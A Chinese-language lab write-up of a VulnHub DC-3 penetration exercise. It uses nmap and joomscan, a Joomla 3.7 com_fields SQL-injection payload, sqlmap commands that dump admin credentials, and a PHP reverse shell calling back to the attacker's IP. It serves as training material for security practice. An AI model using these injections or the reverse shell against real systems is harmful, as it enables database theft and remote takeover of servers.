dc-3靶机渗透

环境准备

dc-3靶机下载链接：

https://download.vulnhub.com/dc/DC-3-2.zip

启动靶机遇到的问题解决文章在下面

http://t.csdnimg.cn/zLQAI

kali最新版 dc-3靶机两台机器都在vmware上运行网络设置NAT模式

渗透过程

信息收集

首先使用ifconfig获取kali的IP地址

可以看到 kali的ip为192.168.52.129

接下来使用nmap扫描当前网段活跃主机

nmap -sn 192.168.52.0/24

这里可以看到 dc-3靶机的ip应该是192.168.52.130

继续使用nmap进行下一步的信息收集

nmap -sV -p- 192.168.52.130

进行服务的版本检测和全端口扫描

可以看到只开放了80端口

那么我们访问一下看看有什么东西

收集一下网站的指纹信息吧

我这边用的是一个火狐的插件-Wappalyzer

可以看到，这边用的是Joomiacms系统

kali上还存在一个专门针对它的漏洞扫描工具Joomscan

joomscan --url http://192.168.52.130

可以看到版本号为3.70

还发现了一个后台地址

漏洞利用

去网上搜了一下，发现3.7是存在一个注入漏洞的尝试复现

直接用的网上的payload

index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x3a,concat(1,(select%20user())),1)%20--+

用户名爆出来了

接下来用sqlmap

sqlmap -u "http://192.168.52.130/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -p "list[fullordering]" --dbs

应该是joomladb这个数据库

python sqlmap.py -u "http://192.168.52.130/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -p "list[fullordering]" -D joomladb --tables

表爆的有点多呀，时间问题就不一个一个试了就是在__users表里

python sqlmap.py -u "http://192.168.52.130/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -p "list[fullordering]" -D "joomladb" -T "#__users" -C "username,password" --dump

这里解密出来是snoopy

因为我这边出了一点问题解密过程就不演示了

咱们拿着这个账号密码去登陆后台

也是成功登录进来了

反弹shell

将代码修改为反弹shell的代码

#当系统没有禁用proc_popen的时候，我们是可以借助proc_popen轻松反弹这样的一个shell的。 <?php $sock = fsockopen("192.168.52.129", "1433"); $descriptorspec = array( 0 => $sock, 1 => $sock, 2 => $sock ); $process = proc_open('/bin/sh', $descriptorspec, $pipes); proc_close($process); ?>

然后点击save保存